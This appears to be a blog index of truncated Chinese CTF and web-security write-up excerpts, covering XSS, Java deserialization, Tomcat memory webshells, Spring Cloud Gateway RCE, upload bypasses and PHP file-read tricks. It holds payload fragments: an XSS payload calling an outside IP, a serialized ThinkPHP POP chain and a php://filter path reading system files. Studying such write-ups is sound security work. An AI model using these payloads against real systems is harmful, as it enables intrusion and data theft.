[diceCTF2022]pastebin https://www.freebuf.com/articles/web/245097.html 就是说呢,img一个标签符也可以自己闭合 payload paste=<img src="x" onerror=window.open('http://8.129.42.1…
鹏城杯Ez_java 分析 看源码 关注到这,考察反序列化 @ResponseBody @PostMapping({"/read"}) public String read(@RequestParam(name = "data", required = true) String data) throws IO…
servlet型内存马 servlet servlet的demo import javax.servlet.*; import javax.servlet.annotation.WebServlet; import java.io.IOException; // 添加路由 @WebServlet("/thaii") public…
valve型内存马 参考value内存马 - Java反序列化 - CTF知识点 | mikufans = (viewofthai.link) pipeline调用链 基础知识 tomcat的adapter到container之间,有个pipeline调用链, 比如在 StandardHostValve 类中是这样调用 vavle 的 invoke…
2022鹏城杯线下决赛 前言 这是上周我在护网做网前工作的时候,被一群朋友拉去打的。由于他们进决赛圈也是意料之外,所以参赛选手没有过web攻击渗透的经验也正常,故最后责任到了我的身上。我们最后拿了第30名,混个优胜奖。赛后,随手一记。 以下是题目描述及我们当时的做法,也有不少是赛后交流wp的时候学到的姿势 水务 水务系统 内网地址 企业 典型企业网…
[SEETF]Flag Portal (Flag 1) ruby服务端这里 elsif path == '/admin' params = req.params flagApi = params.fetch("backend", false) ? params.fetch("backend"…
Spring Cloud Gateway RCE 即 CVE-2022-22947 spring cloud gateway简介 客户端向Spring Cloud GateWay发出请求,然后在GateWay Handler Mapping中找到与请求相匹配的路由,将其发送到GateWay Web Handler;Handler再通过指定的过滤器链…
ciscn2022 ezpop payload http://eci-2ze7x0b01kqqb579phbs.cloudeci1.ichunqiu.com/index.php/index/test post a=O%3A17%3A%22think%5Cmodel%5CPivot%22%3A7%3A%7Bs%3A21%3A%22%00think%5…
上传文件漏洞 参考国光:https://www.sqlsec.com/2020/10/upload.html#toc-heading-22 0 可上传配置文件 可以看upload_labs的攻略 0.1 .htaccess 伪静态 概述来说,htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文…
Dest0g3 520 迎新赛 2022 DestCTF 部分 web wp (持续更新) [DestCTF]phpdest 参考https://www.anquanke.com/post/id/213235 ?file=php://filter/convert.base64-encode/resource=/proc/self/root/proc…